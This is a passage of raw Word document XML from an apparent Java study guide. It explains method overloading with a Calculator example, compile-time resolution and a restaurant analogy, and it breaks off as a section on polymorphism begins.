          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (but this is not enough by itself to overload methods).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6F553" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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an have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different access modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., public, private).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE345D" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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verloading is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolved at compile time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, hence known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515BAB00" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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C903840">
          <v:rect id="_x0000_i1357" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC0953" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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How Does Method Overloading Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE8552"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call a method with the same name, the Java compiler decides which method to invoke based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340DA8A1" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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number of parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AFC7D" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type of parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84EC46"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return type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn’t play a role in method overloading resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969215A" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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3CAE617">
          <v:rect id="_x0000_i1358" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0131776E" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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of Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF627E"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06326A13" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571C01DD"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Overloaded method to add two integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68806681"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add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9604C"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341FF9A2"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9B89444" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491CDB6E"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Overloaded method to add three integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AE5EC"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add(int a, int b, int c) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F37C34"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a + b + c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0BF44"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AE66E83" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752A9D7C"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Overloaded method to add two doubles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE88EA9"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ouble add(double a, double b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5E9E6"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAE3CF"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B627270"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ACCFE71" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354A0107"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73164A6C"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39320C1E"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alculator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007B08A" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520C8F93"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alc.add(5, 10));       // Calls add(int, int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ECD464"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alc.add(5, 10, 15));   // Calls add(int, int, int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CDFF1"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alc.add(5.5, 10.5));   // Calls add(double, double)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47CB56"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C507138"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514360D" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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p w14:paraId="036A8038"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15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5A29C"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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC1256"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16.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58585B03" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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9E9B6FB">
          <v:rect id="_x0000_i1359" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A85FE6" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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How Method Overloading Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673E447" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The method signature consists of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parameter list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07095CF3" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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return type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not part of the method signature and cannot be used to differentiate overloaded methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3F9200" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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rameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overloaded methods must have different parameter types, number of parameters, or both.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0B48F" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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add(int, int) and add(double, double) are overloaded because they take different types of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABB263" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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add(int, int) and add(int, int, int) are overloaded because they take a different number of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE72AAD" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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61D7E9E">
          <v:rect id="_x0000_i1360" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CF6DB" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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en is Method Overloading Useful?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0876F865" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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de Clarity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overloading makes your code easier to read and understand by allowing you to use the same method name for similar actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723DD15" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Multiple add methods for adding different numbers of parameters or different types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E556C8" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ndling Different Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows you to perform the same operation on different types of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3EFC91" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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A multiply method can be overloaded for both integers and floating-point numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C0C35" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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48F5F85">
          <v:rect id="_x0000_i1361" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D3CAC" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD7038" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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rameter List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Overloading depends on the difference in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number</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type</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order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6F719" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Not Based on Return Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You cannot overload methods based only on the return type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2332635C" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ile-time Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overloading is resolved at compile-time, so it doesn’t incur runtime overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A7BC3" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ame Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The overloaded methods must be in the same class or inherited from a superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AE2A6" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A44B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B504F47">
          <v:rect id="_x0000_i1362" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5C8FB" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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eal-World Analogy for Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C1463"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magine you're ordering food at a restaurant. You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order a drink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146CD38" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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small drink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1 parameter: size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B9A1D" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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large drink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1 parameter: size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9409EC" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44BC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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small drink with ice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2 parameters: size, ice).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D9632" w14:textId="77777777" w:rsidR="00C1242E" w:rsidRPr="00CE4B95" w:rsidRDefault="00C1242E" w:rsidP="00A44B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though it's all called "order drink", the method for ordering is overloaded based on the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBBCA1" w14:textId="39283553" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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251531E7">
          <v:rect id="_x0000_i1363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="228106B9" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc196307604"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Polymorphism? Explain with an example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="7B7682A1" w14:textId="36FDB7E8" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">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olymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the key features of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Object-Oriented Programming (OOP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows an object to take </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many forms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
